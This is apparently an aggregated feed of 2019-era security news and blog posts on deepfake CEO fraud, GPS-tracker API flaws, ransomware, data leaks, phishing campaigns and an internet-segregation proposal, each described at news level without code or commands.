3. Segregating the OTDI would increase the incentives for "network traffic smuggling," whereby anti-OTDI elites would compromise, bribe, or otherwise corrupt Western Internet resources to establish surreptitious methods to access the OTDI. This would increase the intrusion pressure upon organizations with networks in OTDI and anti-OTDI locations.

4. Privacy and Internet freedom groups would likely strongly reject the idea of segregating the Internet in this manner. They are vocal and would apply heavy political pressure, similar to recent net neutrality arguments.

5. It might not be technically possible to segregate the Internet as desired by the IFL. Global business does not neatly differentiate between Western and anti-OTDI networks. Similar to the expected resistance from privacy and freedom groups, I expect global commercial lobbies to strongly reject the IFL on two grounds. First, global businesses cannot disentangle themselves from anti-OTDI locations, and second, Western businesses do not want to lose access to markets in anti-OTDI countries.

Rob and I had a wide-ranging discussion, but these five points in written form provide a platform for further analysis.

What do you think about the IFL? Let Rob and I know on Twitter, via @robknake and @taosecurity.

Weekly Update 156

Weekly Update 156

Turns out it's actually a sunny day in Oslo today, although it's the last one I'll see here for quite some time before heading off to Denmark then other European things for the remainder of this trip. I'm talking a little about those events (all listed on my events page), this week's changes to EV, more data breaches and a somewhat semantic argument about the definition of "theft".

Weekly Update 156
Weekly Update 156
Weekly Update 156

References

  1. Entrust are convinced you should still pay them for EV certs (even though the primary value proposition they're still promoting is now gone...)
  2. Scott killed a million bucks worth of EV certs (it turns out that extended validation isn't always so... extended)
  3. The Void.to hacking forum got breached and is now in HIBP (a lot of private messages in there people really wouldn't want being traced back to them)
  4. Garmin in South Africa had a whole bunch of credit cards siphoned off (looks like a classic Magecart attack)
  5. Does a data breach actually constitute "theft" given the original owner isn't deprived of it? (that's a link to the Twitter thread on it, I think the term is a bit overloaded TBH)
  6. Sponsored by Okta: You wouldn’t roll your own hashing algorithm, so why build your own auth? Secure users in mins with a free dev account.

How Deepfakes Can Ruin Your Business

Worldwide concern is increasing over the adverse effects that deepfakes could have on society, and for good reason. Recently, the employee of an energy company based in the UK was tricked into thinking he was talking on the phone with his boss, the CEO of the German parent company, who asked him to transfer $243,000 to a Hungarian supplier. Of course, the employee was not speaking with the actual CEO, but with a scammer who was impersonating the real CEO through voice-altering AI.

This kind of social engineering attack is not new. In fact, merely two months ago, cybersecurity researchers identified three successful deepfake audio attacks on companies. Their “CEO” called a financial officer to ask for an urgent money transfer. The voices of the real CEO had been taken from earnings calls, YouTube videos, TED talks, and other recordings, and inserted into an AI program which enabled fraudsters to imitate the voices.

These types of incidents are the audio version of what are known as deepfake videos, which have been causing global panic for the past couple of years. As we become accustomed to the existence of deepfakes, this may affect our trust in any videos we see or audio footage we hear, including the real ones. Videos, which once used to be the ultimate form of truth that transcended edited pictures that can be easily altered, can now deceive us as well.

And this brings us to the question:

How safe is your business in the face of the deepfake threat?

What are Deepfakes?

Deepfakes are fake video and audio footage of individuals, that are meant to make them look like they have said and done things which, in fact, they haven’t. “Deep” relates to the “deep learning” technology used to produce the media and “fake” to its artificial nature. Most of the time, the faces of people are superimposed on the bodies of others, or their actual figure is altered in such a way that it appears to be saying and doing something that they never did.

The term was born in 2017 when a Reddit user posted a fake adult video showing the faces of some Hollywood celebrities. Later, the user also published the machine learning code used to create the video.

Can we detect and stop Deepfakes?

Right now, researchers and companies are investigating how they can utilize AI to distinguish and wipe out deepfakes. New advancements have started to rise that are meant to help us identify which pictures and recordings are real and which are fake.

For example, Facebook, Microsoft, the Partnership on AI coalition, and academics from several universities are launching a contest to help improve the detection of deepfakes. They aim to encourage people to produce a technology that can be used by anyone to detect when deepfake material has been created. The Deepfake Detection Challenge will feature a data set and leaderboard, alongside grants and awards, to motivate participants to design new methods of identifying and stopping fake footage meant to deceive others.

Yet, this won’t prevent the fake media from being created, shared, seen and heard by millions of people before it is removed. And without doubt, it can be extremely difficult to face the consequences and repair the damage once malicious materials get distributed.

How can you spot Deepfake videos?

Until some highly reliable technical solutions are designed, we should learn to identify the tell-tale signs of deepfakes. So, here are the flaws you should be looking for:

  • Blinking – According to research, the eye blinking in videos seems to be not that well presented in deepfake videos.
  • Head position – Watch out for blurry face borders that subtly blend into the background.
  • Artificially-looking skin – If the face looks extra smooth like it’s been edited, this may be another warning sign. Also, watch out for the skin tone that can be slightly different than the rest of the body.
  • Slow speech and different intonation – Sometimes, you will notice the one who is being impersonated talks rather slowly or there isn’t quite a match between the real person’s voice and the fake one.
  • An overall strange look and feel – In the end, you should trust your instinct. Sometimes, you can simply tell something’s not right.

At the moment, one can easily spot deepfakes. But in the future, as this technology progresses, it will gradually become more difficult.

Deepfakes could destroy everything

Here is what deepfakes could have a highly negative impact on:

#1. Politics

Deepfakes could influence elections since they can put words into politicians’ mouths and make them look like they’ve done or said certain things which, in fact, they haven’t. Deepfake producers could target popular social media channels, where the content shared can instantly become viral.

#2. Justice

Fake evidence for criminal trials could be used against people in court and this way, they could become accused of crimes they did not commit. Thus, the wrong people could go to jail. And on the other hand, people who are guilty could be set free based on false proof.

#3. Stock market

Deepfakes could be used to manipulate stock prices when altered footage of influential people making certain statements gets distributed. Imagine what would happen if a fake video of the CEOs of companies such as Apple, Amazon, or Google declaring they’ve done something illegal. For instance, back in 2008, Apple’s stock dropped 10 points based on a false rumor that Steve Jobs had suffered a major heart attack emerged.

#4. Online bullying

The deepfake technology could also be used to amplify cyberbullying, especially since it’s now becoming widely available. People can easily turn into victims when manipulated media of them is posted online. Or they can get blackmailed by cybercriminals who are threatening leak the footage if, for instance, they don’t pay a certain amount of money.

#5. Companies

Someone could be making false statements about your business to destabilize and degrade it. Malicious actors could make it look like you or someone within your organization admitting to having been involved in consumer fraud, bribery, sexual abuse, and any other wrongdoings you can think of. Obviously, these kinds of false statements can destroy your company’s reputation and make it difficult for you to prove otherwise.

What can be done?

Due to the current gaps in the law, producers of deepfakes are not incriminated. However, the Deepfakes Accountability Act (known as “Defending Each and Every Person from False Appearances by Keeping Exploitation Subject to Accountability Act – yes, you’ve correctly identified an acronym right there) aims to take measures to criminalize this type of fake media.

In short, anyone who creates deepfakes would be required to reveal that the footage is altered. And if they fail to do so, it will be considered a crime. The existence of these kinds of regulations is mandatory to protect deepfake victims and also the general public from distorted information.

How can you protect your business from Deepfakes?

Your competitors could resort to deepfake blackmail in order to try to eliminate you from the industry.

No matter how good technological deepfake detection solutions will become, they won’t prevent manipulated media from being shared and reach large numbers of people. So, the best way is to teach your employees how to identify fake footage and question everything that seems suspicions inside the organization.

#1. Train your employees

The topic of deepfakes can be looked at during your cybersecurity training. For instance, if they receive an unexpected call from the CEO who is asking them to transfer $1 million to a bank account, they could, first of all, question if the person on the other line is who they say they are. Maybe, a good countermeasure would be to have a few security questions in place that need to be asked to verify a caller’s identity.

#2. Monitor your brand’s online presence

Your brand’s presence is probably already being monitored online. So, make sure your designated people keep an eye on fake content involving your organization and if anything suspicious is brought to light, they do their best to take it down as soon as possible and mitigate the damage.

This brings us to the next point.

#3. Be transparent

If you become a victim of deepfakes, ensure that your audience is aware of the targeted attack. Trying to ignore what happened or assume that people didn’t believe what they’ve seen or heard won’t make the issue disappear. Therefore, your PR efforts should be centered around communicating that someone from your company has been impersonated and highlighting the artificial nature of the distributed footage.

Never let misinformation erode your public’s confidence!

Wrapping it all up

The dangers of deefakes are real and should not be underestimated. A single ill-intended rumor could destroy your business. So, you, both as an individual and an organization, should be prepared to stand against these threats.

 

The post How Deepfakes Can Ruin Your Business appeared first on Heimdal Security Blog.

#44CON: GPS Trackers Hacked to Make Premium Rate Calls

#44CON: GPS Trackers Hacked to Make Premium Rate Calls

Speaking at 44CON, Pen Test Partners researchers Tony Gee and Vangelis Stykas demonstrated vulnerabilities in GPS trackers, which enabled them to call premium rate phone numbers, and possibly influence the outcome of television talent shows.

Gee said that there is demand for GPS trackers, which are used in watches for kids, cars and even on pets’ collars, but their research had found consistent API vulnerabilities. Gee said that the problems were in “a lot of common APIs and used across platforms” in IoT products that were available cheaply.

Stykas called one product range “a monstrosity,” saying that the research into Thinkrace technology found that most API calls did not require authentication, and all users start with the default password “123456.” There were at least 370 vulnerable devices, across 80 domains on 40 different servers, which Stykas said allows anyone to be tracked, with a hacker able to change the email and take over the device, and force a firmware update. 

Calling it a “classic horizontal escalation of privilege,” Stykas said that the vendor had not responded to vulnerability disclosures for three years “on multiple attempts.”

In further research, Gee said that a lot of the GPS devices, particularly tracker watches for kids, used a pay-as-you-go SIM card, and allowed for a premium rate phone line to be called. “If we own the number, we make the money,” he said, pointing out that the costs of setting up a number only runs into hundreds of pounds, but regulation by the PSA was strong on doing this.

Looking at the options of hacking a GPS tracker to enable text voting to a premium line, Gee said that a typical SMS vote is 35p, so with a £10 top up you could vote 28 times. If there are 25 million vulnerable devices, that can enable seven billion votes. While he admitted that the voting at the annual Eurovision song contest could not be influenced because of the jury system, it was possible to influence talent shows like X Factor and Britain’s Got Talent. This would also allow the attacker to gamble on who the winner would be.

Talking on the disclosure, Gee said that the UK’s main four providers (o2, Vodafone, EE and 3) have a default “on” for premium lines to be called. Meanwhile, the vendors have been notified but “most products are not fixed and multiple devices have the same flaws.” However, the PSA have responded and said that Pen Test Partners will be invited to review changes.

Gee concluded by saying that most trackers will not be fixed, but manufacturers “need to get better” as “authentication is not authorization.”

This Week in Security News: IoT Devices Are a Target in Cybercriminal Underground

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how fileless malware abuses PowerShell. Also, read how Trend Micro researchers are pulling back the curtain on the cybercriminal underground to warn consumers and businesses about potential threats against IoT devices.

Read on:

Are IoT Threats Discussed In The Cybercriminal Underground?

Trend Micro researchers from around the globe monitored five different cybercriminal undergrounds and, given the amount of chatter, found that there is no doubt that IoT devices, mainly routers, are certainly a target.

From BinDiff to Zero-Day: A Proof of Concept Exploiting CVE-201901208 in Internet Explorer

Researchers share a proof of concept showing how a use-after-free vulnerability in Internet Explorer can be fully and consistently exploited in Windows 10 RS5. The flaw was discovered through BinDiff and addressed in Microsoft’s September Patch Tuesday.

‘Purple Fox’ Fileless Malware with Rookit Component Delivered by Rig Exploit Kit Now Abuses PowerShell

The newest iteration of Purple Fox that researchers came across, being delivered by Rig, retains its rookit component by abusing publicly available code and now eschews its use of NSIS in favor of abusing PowerShell, making Purple Fox capable of fileless infection. This blog discusses features of this malware and security recommendations to avoid these types of threats.

Trend Micro Security’s Family of 2020 Releases Provide Enhanced Protections for PCs, Macs, Mobile Devices, and Home Networks

Trend Micro ensures its family of products is progressively enhanced to meet the needs of consumers and the Trend Micro Security 2020 Fall Release is no exception. Endpoint and network security products are improved to provide the most advanced protections from persistent, new, and emerging threats.

Smart Cities Will Require Smarter Cybersecurity

As cities become smarter, officials and security experts say that current defenses are unlikely to keep hackers at bay. Ideas for making cyber defenses smarter include reducing reliance on passwords and open-sourcing security standards to benefit from the perspective of a wider range of security professionals.

September Patch Tuesday Bears More Remote Desktop Vulnerability Fixes and Two Zero-Days

Continuing the trend from last month, several critical patches were for Remote Desktop Clients – all Remote Code Execution (RCE) vulnerabilities. Microsoft also patched two zero-days which are both elevation of privilege vulnerabilities.

Cybersecurity: 99% of email attacks rely on victims clicking links

Social engineering is by far the biggest factor in malicious hacking campaigns and nearly all successful email-based cyberattacks require the target to open files, click on links, or carry out some other action. While many of these attacks are designed to look highly legitimate, there are ways to identify what could potentially be a malicious attack.

Business Roundtable calls on Congress to pass consumer data privacy law

CEOs of 51 companies from the Business Roundtable, including Amazon, IBM and Salesforce, signed a letter to U.S. congressional leaders urging them to create a comprehensive consumer data privacy law.

Wikipedia Gets $2.5M Donation to Boost Cybersecurity

Wikipedia confirmed that it was hit by a malicious DDoS attack that took it offline across many countries. Following the attack, the Wikipedia Foundation received a $2.5M donation from Craigslist founder, Craig Newmark, to further expand security programs.

Ransomware attack on Premier Family Medical reportedly impacts records of 320K patients

The medical provider noted that the malware restricted employee’s access to their systems and data and has officially revealed the approximate number of affected patients in a disclosure to the federal government.

IoT Security: Now dark web hackers are targeting internet-connected gas pumps

Cyber criminals are increasingly turning their attention to hacking Internet of Things devices as connected products proliferate. While routers remain the top target for IoT-based cyberattacks, there’s a lot of discussion in underground forums about compromising internet-connected gas pumps.

Enhanced Trend Micro Security protects inboxes from scams and phishing attacks
Trend Micro announced the latest version of its flagship consumer offering, Trend Micro Security, which features enhanced protection from web threats and a new AI-powered Fraud Buster tool to protect Gmail and Outlook inboxes across the globe.

Texas Municipalities Hit by REvil/Sodinokibi Paid No Ransom, Over Half Resume Operations

Cybercriminals who held to ransom the files of 22 Texas local government units for a combined ransom amount of US$2.5 million did not get a single cent thanks to a coordinated state and federal cyber response plan.

Are you well-versed on Trend’s suggestions for protecting your routers and other devices from malware? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: IoT Devices Are a Target in Cybercriminal Underground appeared first on .

Trivia! 5 things you never imagined could be hacked by cyber criminals

The term “hacking” has become the talk of the town, with one new incidence of hacking being reported every single day. The internet is in for a spin as cases of hacking are getting reported on a global level, triggering the realization that anything and everything with a vulnerable spot…

Thoughtful Design in the Age of Cybersecurity AI

Reading Time: ~ 3 min.

AI and machine learning offer tremendous promise for humanity in terms of helping us make sense of Big Data. But, while the processing power of these tools is integral for understanding trends and predicting threats, it’s not sufficient on its own.

Thoughtful design of threat intelligence—design that accounts for the ultimate needs of its consumers—is essential too. There are three areas where thoughtful design of AI for cybersecurity increases overall utility for its end users.

Designing where your data comes from

To set the process of machine learning in motion, data scientists rely on robust data sets they can use to train models that deduce patterns. If your data is siloed, it relies on a single community of endpoints or is made up only of data gathered from sensors like honeypots and crawlers. There are bound to be gaps in the resultant threat intelligence.

A diverse set of real-world endpoints is essential to achieve actionable threat intelligence. For one thing, machine learning models can be prone to picking up biases if exposed to either too much of a particular threat or too narrow of a user base. That may make the model adept at discovering one type of threat, but not so great at noticing others. Well-rounded, globally-sourced data provides the most accurate picture of threat trends.

Another significant reason real-world endpoints are essential is that some malware excels at evading traditional crawling mechanisms. This is especially common for phishing sites targeting specific geos or user environments, as well as for malware executables. Phishing sites can hide their malicious content from crawlers, and malware can appear benign or sit on a user’s endpoint for extended periods of time without taking an action.

Designing how to illustrate data’s context

Historical trends help to gauge future measurements, so designing threat intelligence that accounts for context is essential. Take a major website like www.google.com for example. Historical threat intelligence signals it’s been benign for years, leading to the conclusion that its owners have put solid security practices in place and are committed to not letting it become a vector for bad actors. On the other hand, if we look at a domain that was only very recently registered or has a long history of presenting a threat, there’s a greater chance it will behave negatively in the future. 

Illustrating this type of information in a useful way can take the form of a reputation score. Since predictions about a data object’s future actions—whether it be a URL, file, or mobile app—are based on probability, reputation scores can help determine the probability that an object may become a future threat, helping organizations determine the level of risk they are comfortable with and set their policies accordingly.

For more information on why context is critical to actionable threat intelligence, click here.

Designing how you classify and apply the data

Finally, how a threat intelligence provider classifies data and the options they offer partners and users in terms of how to apply it can greatly increase its utility. Protecting networks, homes, and devices from internet threats is one thing, and certainly desirable for any threat intelligence feed, but that’s far from all it can do.

Technology vendors designing a parental control product, for instance, need threat intelligence capable of classifying content based on its appropriateness for children. And any parent knows malware isn’t the only thing children should be shielded from. Categories like adult content, gambling sites, or hubs for pirating legitimate media may also be worthy of avoiding. This flexibility extends to the workplace, too, where peer-to-peer streaming and social media sites can affect worker productivity and slow network speeds, not to mention introduce regulatory compliance concerns. Being able to classify internet object with such scalpel-like precision makes thoughtfully designed threat intelligence that is much more useful for the partners leveraging it.

Finally, the speed at which new threat intelligence findings are applied to all endpoints on a device is critical. It’s well-known that static threat lists can’t keep up with the pace of today’s malware, but updating those lists on a daily basis isn’t cutting it anymore either. The time from initial detection to global protection must be a matter of minutes.

This brings us back to where we started: the need for a robust, geographically diverse data set from which to draw our threat intelligence. For more information on how the Webroot Platform draws its data to protect customers and vendor partners around the globe, visit our threat intelligence page.

The post Thoughtful Design in the Age of Cybersecurity AI appeared first on Webroot Blog.

Cyber News Rundown: Arizona School Ransomware Attack

Reading Time: ~ 2 min.

Ransomware Closes Arizona School District

As many students began returning for the fall semester, classes were cancelled in the Flagstaff Unified School District in Arizona after a ransomware attack disabled some of the district’s computer systems. Officials haven’t yet released any additional information on the ransom demanded or if any sensitive employee or student documents was compromised. The attack is another in a chain of ransomware campaigns affecting dozens of school districts around the country in recent months.

Want more on the latest threats to your online security and privacy?
Follow us on Facebook and Twitter to stay up to date.

BEC Scam Targets Toyota Corporation

A subsidiary company of Toyota fell victim to a business email compromise (BEC) that could cost more than $37 million. Using social engineering to convince the victim to send the wire transfer has become a common practice around the world and earned scammers an estimated $1.3 billion in 2018 alone. Officials are still working to determine the proper course of action to recover the stolen funds, though it is unlikely they will be able to track down their present location.

International BEC Sting Nets 281 Arrests

With the cooperation of many law enforcement agencies around the world, at least 281 individuals were taken into custody for their roles in various BEC scams. Along with the arrests, officials seized $3.7 million in cash that had been stolen by redirecting wire transfers while posing as a high-level executive. While the majority of arrests came from Europe and Africa, nearly a quarter occurred in the U.S.

LokiBot Campaign Affects U.S. Manufacturer

A poorly written email phishing campaign was recently discovered with a rather malicious payload called  LokiBot. In the scam, once a victim would open the attachment (with assurances in the email that it simply needs to be reviewed), an archive would unzip and allow the payload to begin hunting for credentials and any other sensitive information stored on the system. After reviewing the LokiBot sample, the IP address from which the campaign originated from has been tied to several other, similar campaigns from recent months.

Oklahoma State Trooper Pension Fund Stolen

Malicious hackers recently stole more than $4.2 million from the Oklahoma State Trooper’s pension fund, which was to be used to assist roughly 1,500 retired law enforcement agents in the state. While most of the benefits programs should remain unaffected, officials are confident that they will be able to recover the funds, which would also be covered by insurance company if unable to be recovered.

The post Cyber News Rundown: Arizona School Ransomware Attack appeared first on Webroot Blog.

#44CON: Establishing a Mental Health Toolbox

#44CON: Establishing a Mental Health Toolbox

Noting the warning lights to assess your levels of stress and mental health now, and in the future, can save a lot of anguish in your working life.

Speaking at 44CON in London on the issue of dealing with mental health, Duo Security CISO advisory group member J Wolfgang Goerlich recommended a strategy of a “career owners manual” and knowing what to do to “make sure you have got a career and what you’re doing well.”

He recommended having a the right state of health to be able to thrive in what he called a “good community,” where we need to be supportive of others, as “a lot of us struggle.”

Goerlich advised taking a back seat, stepping back from work for a few months and to avoid being afraid of duplicating work.

When looking at yourself in a current position, he recommended taking the following steps:

  • Look at how your culture fits the company culture. Are we happy with the people in our organization “and do they make us feel good?”
  • Are our values reflected in theirs, and do we feel good about ourselves when we look in the mirror or do we feel like we are compromising ourselves?
  • Are the tasks we are doing good?
  • Is diversity good where we work, as diversity beings different perspective and points of view

“You need to be sure the inputs line up, as different companies have different values” he said, as if we are unhappy, it is too easy to ignore warning lights around our mental health, and it is too easy to take a “teenager’s action” as they ignore warning lights on a car. These warning lights should be around:

  • Physiological effects
  • Non-competitive compensation
  • Lack of training
  • Lack of career path
  • Poor teamwork
  • Poor leadership
  • No appreciation or recognition
  • Misaligned values and culture

In terms of tools, Goerlich recommended relaxing, recharging and re-learning, and doing “what is good for you.” This included time off work, what Goerlich called “zero days,” to recharge. The steps to take to recharge are as follows:

Weekly: prepare for the week ahead, do the “basic things,” de-stress and energize, and review the previous week.

Monthly: review stress, check warning lights, and schedule “zero days.”

Quarterly: check your health, review accomplishments, review learning, plan for next quarter, and schedule time off.

Annually: annual job reviews, and annually review your job.

Decade: asses who you are now, what you enjoy now, and where is the job market going?

“Make sure you have got the tools in your toolbox and are doing maintenance on your career,” he concluded. “This [cybersecurity] is a fantastic career and industry, but we see too many people struggle.”

Marketer Exposes 198 Million Car Buyer Records

Marketer Exposes 198 Million Car Buyer Records

Another unprotected Elasticsearch database has been discovered by researchers, this time exposing personally identifiable information (PII) linked to 198 million car buying records.

The privacy snafu was discovered back in August by Jeremiah Fowler, researcher at SecurityDiscovery.

The non-password protected database contained a massive 413GB of data on potential car buyers, including names, email addresses, phone numbers, home addresses and more stored in plain text.

Also left publicly accessible were IP addresses, ports, pathways, and storage info “that cyber-criminals could exploit to access deeper into the network,” he explained.

Fowler spent several days trying to locate the owner of the database, which contained information from multiple websites.

“Only by manually reviewing multiple domains did I discover that they all linked back to dealerleads.com,” he added. “I was able to speak with the general sales manager who was concerned and professional with getting the information secured and public access was closed shortly after my notification by phone.”

As the name suggests, Dealer Leads provides online marketing support in the form of prospective car buyers for dealerships around the US. It's unknown how long the data was exposed for.

“It is unclear if Dealer Leads has notified individuals, dealerships, or authorities about the data incident. Because of the size and scope of the network applicants and potential customers may not know if their data was exposed,” Fowler warned.

“Also, when contacting a local dealership in their hometown about a specific automobile they may not have known that the website actually collected their data as a lead or that this data could potentially be stored, saved, sold, or shared via DealerLeads.”

The incident is just the latest in a long line of privacy leaks via Elasticsearch, AWS S3, and other online platforms, due to security misconfigurations.

In recent months, Honda exposed 134 million company documents, a leading Chinese uni leaked 8TB of email metadata, and Dow Jones left a sensitive global watchlist of criminals and terrorists open to the public — all via misconfigured Elasticsearch instances.

Fin7 sysadmin pleads guilty to running IT for billion-dollar crime syndicate

Fedir Oleksiyovich Hladyr is the first member of the infamous cybercrime network to be found guilty of hacking-related crimes in a US court.

Iranian Threat Group Targets 380 Global Universities

Iranian Threat Group Targets 380 Global Universities

An Iranian threat group exposed last year has been detected targeted hundreds of universities in over 30 countries in a global phishing operation.

Cobalt Dickens has been linked to indictments last year against nine Iranian nationals who worked for the Mabna Institute. They allegedly stole more than 31TB of data from over 140 US universities, 30 US companies and five government agencies, alongside more than 176 universities in 21 other countries.

The Secureworks Counter Treat Unit this week claimed their activity has not declined despite the publicity given to the indictments; in fact, it discovered a new campaign similar to the group's August 2018 phishing raids, using free online services and publicly available tools.

Specifically, the group uses compromised university resources to send spoofed library-themed emails containing links to log-in pages designed to harvest user credentials.

Some 20 new domains were registered in Australia, the United States, the United Kingdom, Canada, Hong Kong, and Switzerland using the Freenom domain provider. Many use valid SSL certificates issued by Let’s Encrypt to add further authenticity to the phishing campaigns.

Continuing the theme of using publicly available resources to carry out these attacks, the group utilized the SingleFile plugin available on GitHub and the free HTTrack Website Copier standalone application, to copy the login pages of targeted university resources, according to Secureworks.

The researchers claimed that metadata in the spoofed web pages indicates the attackers are of Iranian origin. At least 380 universities worldwide have apparently been targeted in this latest campaign.

“Some educational institutions have implemented multi-factor authentication (MFA) to specifically address this threat,” it concluded.

“While implementing additional security controls like MFA could seem burdensome in environments that value user flexibility and innovation, single-password accounts are insecure. CTU researchers recommend that all organizations protect Internet-facing resources with MFA to mitigate credential-focused threats.”

Universities are an increasingly popular target for nation state attackers looking for highly sensitive research to advance homegrown development programs.